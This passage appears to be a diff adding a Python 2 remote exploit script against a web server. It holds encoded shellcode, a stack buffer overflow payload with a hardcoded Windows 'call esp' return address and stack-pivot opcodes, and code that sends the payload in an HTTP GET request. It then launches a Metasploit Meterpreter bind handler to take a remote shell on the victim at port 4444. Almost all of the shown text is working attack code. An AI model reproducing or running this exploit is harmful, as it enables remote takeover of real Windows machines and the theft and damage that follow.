+"\xb8\x17\xb2\x0d\x6b\x7f\xab\x55\xd0\x63\xe3\x0d\x07\xd4\xab"
+"\x50\x02\xa0\x9b\x46\x9f\x9e\x65\x8b\x32\x98\x92\x66\x46\xab"
+"\xa9\xfb\xcb\x64\xd7\xa2\x46\xbd\xf2\x0d\x6b\x7b\xab\x55\x55"
+"\xd4\xa6\xcd\xb8\x07\xb6\x87\xe0\xd4\xae\x0d\x32\x8f\x23\xc2"
+"\x17\x7b\xf1\xdd\x52\x06\xf0\xd7\xcc\xbf\xf2\xd9\x69\xd4\xb8"
+"\x6d\xb5\x02\xc2\xb5\x01\x5f\xaa\xee\x44\x2c\x98\xd9\x67\x37"
+"\xe6\xf1\x15\x58\x55\x53\x8b\xcf\xab\x86\x33\x76\x6e\xd2\x63"
+"\x37\x83\x06\x58\x5f\x55\x53\x63\x0f\xfa\xd6\x73\x0f\xea\xd6"
+"\x5b\xb5\xa5\x59\xd3\xa0\x7f\x11\x02\x84\xf9\xee\x31\x5f\xbb"
+"\xda\xba\xb9\xc0\x96\x65\x08\xc2\x44\xe8\x68\xcd\x79\xe6\x0c"
+"\xfd\xee\x84\xb6\x92\x79\xcc\x8a\xf9\xd5\x64\x37\xde\x6a\x08"
+"\xbe\x55\x53\x64\xc8\xc2\xf3\x5d\x12\xcb\x79\xe6\x35\xaa\xec"
+"\x37\x09\xfd\xee\x31\x86\x62\xd9\xcc\x8a\x21\xb0\x59\x1f\xc2"
+"\x86\x23\x5f\xaa\xd0\x59\x5f\xc2\xde\x97\x0c\x4f\x79\xe6\xcc"
+"\xf9\xec\x33\x09\xf9\xd1\x5b\x5d\x73\x4e\x6c\xa0\x7f\x87\xf0"
+"\x76\x6c\x03\xc5\x2a\x46\x45\x33\x5f"
+)
+
+nop =  "A" * 33 + '\x90' * 20
+junk = "C" *(515-(len(nop)+len(shellcode)))
+opcode= "\x83\xc4\x44\x83\xc4\x44\x83\xc4\x44\xff\xe4"
+eip = '\x63\x46\x92\x7c'
+#7c86467b 7C924663 call esp
+buffer = nop + shellcode + junk + eip + opcode + "B" * 60 
+
+req = ("GET /" + buffer + " HTTP/1.1\r\n"
+"Host: " + host + ":" + str(port) + "\r\n"
+"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
+"Connection: keep-alive\r\n\r\n")
+print "  [+] Connecting to %s:%d" % (host, port)
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+try:
+	s.connect((host, port))
+	print "  [+] Sending payload.." + "nop: " + str(len(nop)) + "   junk: " + str(len(junk)) + "   shellcode: " + str(len(shellcode))
+	s.send(req)
+	data = s.recv(1024)
+	print "  [+] Closing connection.."
+	s.close()
+	print "[+] Exploit Sent Successfully"
+    	print "[+] Waiting for 3 sec before spawning shell to " + host + ":4444\r"
+    	print "\r"
+    	time.sleep(3)
+        os.system("msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.0.106 LPORT=4444 E")
+    	print "[-] Connection lost from " + host + ":4444 \r"
+except:
+    	print "[-] Could not connect to " + host + ":4444\r"
+        sys.exit(0)